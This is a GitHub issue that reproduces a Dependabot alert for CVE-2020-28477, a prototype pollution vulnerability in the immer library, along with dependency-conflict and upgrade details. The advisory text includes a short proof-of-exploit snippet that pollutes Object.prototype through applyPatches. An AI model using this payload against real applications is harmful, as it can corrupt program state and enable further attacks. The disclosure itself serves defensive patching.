dependabot is throwing high-severity warnings on version of immer - warning pasted below
#4191
Comments
bumblefudge
added
bug
|
Related PR: facebook/create-react-app#10412 |
Josh-Cena
added
external
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Dependabot cannot update immer to a non-vulnerable version
The latest possible version that can be installed is 1.10.0 because of the following conflicting dependencies:
@docusaurus/core@2.0.0-alpha.70 requires immer@1.10.0 via a transitive dependency on react-dev-utils@10.2.1
@docusaurus/preset-classic@2.0.0-alpha.70 requires immer@1.10.0 via a transitive dependency on react-dev-utils@10.2.1
The earliest fixed version is 8.0.1.
View logs or learn more about troubleshooting Dependabot errors.
1 immer vulnerability found in yarn.lock 14 days ago
Remediation
Upgrade immer to version 8.0.1 or later. For example:
immer@^8.0.1:
version "8.0.1"
Always verify the validity and compatibility of suggestions with your codebase.
Details
CVE-2020-28477
high severity
Vulnerable versions: < 8.0.1
Patched version: 8.0.1
Overview
Affected versions of immer are vulnerable to Prototype Pollution.
Proof of exploit
const {applyPatches, enablePatches} = require("immer");
enablePatches();
let obj = {};
console.log("Before : " + obj.polluted);
applyPatches({}, [ { op: 'add', path: [ "proto", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "proto", "polluted" ], value: "yes" } ]);
console.log("After : " + obj.polluted);
Remediation
Version 8.0.1 contains a fix for this vulnerability, updating is recommended.
The text was updated successfully, but these errors were encountered: